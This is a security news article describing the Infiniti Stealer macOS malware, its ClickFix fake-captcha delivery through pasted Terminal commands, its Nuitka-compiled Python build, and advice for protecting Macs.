A new malware strain, dubbed Infiniti Stealer, is infecting Mac computers by exploiting user behavior rather than traditional hacking methods. The attack, detailed in a recent Malwarebytes report, leverages a social engineering technique called “ClickFix” to bypass security defenses and steal sensitive data. This represents a shift in tactics, as attackers increasingly target Apple devices under the false assumption they are less vulnerable.
How Infiniti Stealer Works: The ClickFix Method
The campaign begins with a phishing scheme or compromised webpage that presents a fake “Cloudflare human verification” captcha. Victims are prompted to complete a standard “I am not a robot” check, but also instructed to perform a “manual step”: opening the Terminal app on their Mac and pasting provided code.
“Because the user runs the command directly, many traditional defenses are bypassed. There’s no exploit, no malicious attachment, and no drive-by download.”
– Malwarebytes
This command delivers the Infiniti Stealer malware directly to the system. The fact that users willingly execute the malicious code makes detection significantly harder, as it avoids typical malware triggers.
The Malware’s Capabilities and Technical Details
Infiniti Stealer is written in Python but compiled with Nuitka, which converts it into a native macOS binary. This makes analysis and detection far more complex. Once installed, the malware steals passwords, screenshots, browser data (including cookies), and other sensitive information, transmitting it to the attacker’s server.
This campaign is notable as the first documented case combining the ClickFix delivery method with a Nuitka-compiled Python stealer. The trend underscores a growing sophistication in how attackers target Macs, moving beyond simple exploits to more deceptive techniques.
Protecting Yourself From This Threat
Users should be extremely cautious when following instructions from unfamiliar websites. No legitimate captcha or verification process requires entering code into the Terminal app. If you are not comfortable with code, avoid any process that asks you to paste commands into Terminal.
If you suspect your Mac is infected, immediately stop using it. Change your passwords on a separate, clean device and revoke access from the compromised computer if possible.
The Broader Trend of Targeting Apple Devices
Infiniti Stealer is part of a wider trend of attackers increasingly targeting Apple devices. This shift is driven by the misconception that Macs are immune to malware. Other recent threats, like DarkSword targeting iPhones, demonstrate that iOS and macOS are just as vulnerable as other platforms when users are tricked into enabling malicious code.
